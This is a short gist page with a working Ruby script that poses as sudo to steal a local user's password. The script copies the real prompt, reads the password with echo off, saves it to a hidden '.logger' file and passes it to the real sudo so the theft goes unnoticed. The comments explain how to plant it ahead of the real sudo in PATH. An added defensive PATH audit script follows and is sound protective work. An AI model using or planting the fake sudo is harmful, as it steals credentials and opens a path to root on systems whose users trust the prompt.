Last active
August 29, 2015 14:08
fake sudo to grab local user passwords when you already have access at user level.
```ruby
#!/usr/bin/env ruby
# HISPAGATOS.org
# Proof of concept to capture a user's password.
# When an attacker compromises a regular user's shell account, they can
# jump to root or steal the user's password by adding the directory where
# this fake sudo sits to the user's environment, e.g. PATH=/theplace:$PATH.
# Note that it is placed BEFORE the rest of the PATH entries, so any program
# in this directory runs BEFORE the real program of the same name.
# [email protected] http://hispagatos.org
require 'io/console'

# Mimic the real sudo prompt and read the password with echo turned off.
def promp()
  username = ENV['LOGNAME']
  STDOUT.flush
  print "[sudo] password for #{username}: "
  p = STDIN.noecho(&:gets).chomp
end

ARGUMENTS = ARGV.join(' ')
paso = promp()

# Record the captured password in the current directory.
File.open('.logger', 'w') do |you|
  you.puts(paso)
end

# Hand the password to the real sudo so the command still runs as expected.
cmd = "echo '#{paso}' | sudo -kS "+ARGUMENTS
exec cmd
```
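The attack above only works if a directory the attacker can write to is searched before the directory holding the real sudo. The following PATH audit is an added example, not part of the gist: it walks a PATH string in order and reports relative or empty entries, user-writable directories, and any executable named like a protected command that precedes a trusted copy (root-owned, setuid, in a non-writable directory). The protected command list is an assumption.

```ruby
#!/usr/bin/env ruby
# Added example (not from the gist): audit a PATH string for the ordering the
# fake sudo relies on. Findings are hashes with a :kind of
#   :relative - empty or non-absolute entry (the current directory gets searched)
#   :writable - directory the current user can write to
#   :shadow   - executable named like a protected command that is searched
#               before a trusted copy
PROTECTED = %w[sudo su doas].freeze   # assumption: commands worth protecting

# A trusted copy is root-owned, setuid, and lives in a directory we cannot write.
def trusted?(file)
  st = File.stat(file)
  st.uid.zero? && st.setuid? && !File.writable?(File.dirname(file))
end

# Returns an array of finding hashes; an empty array means nothing suspicious.
def audit_path(path_string, protected: PROTECTED)
  findings = []
  trusted_seen = {}                    # name => true once the real binary was found
  path_string.split(':', -1).each_with_index do |dir, idx|
    unless dir.start_with?('/')
      findings << { kind: :relative, entry: idx, dir: dir }
      next
    end
    next unless File.directory?(dir)
    findings << { kind: :writable, entry: idx, dir: dir } if File.writable?(dir)
    protected.each do |name|
      candidate = File.join(dir, name)
      next unless File.file?(candidate) && File.executable?(candidate)
      next if trusted_seen[name]        # later copies cannot shadow anything
      if trusted?(candidate)
        trusted_seen[name] = true
      else
        findings << { kind: :shadow, entry: idx, dir: dir, file: candidate }
      end
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  audit_path(ENV.fetch('PATH', '')).each do |f|
    puts "#{f[:kind]} at PATH[#{f[:entry]}] #{f[:dir]}#{f[:file] ? " (#{f[:file]})" : ''}"
  end
end
```

Run it from a user's shell to see whether that user's PATH would let a planted sudo win; a :shadow finding for sudo is exactly the condition the script above needs.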
Did this in 10 m to prove the concept to a coworker.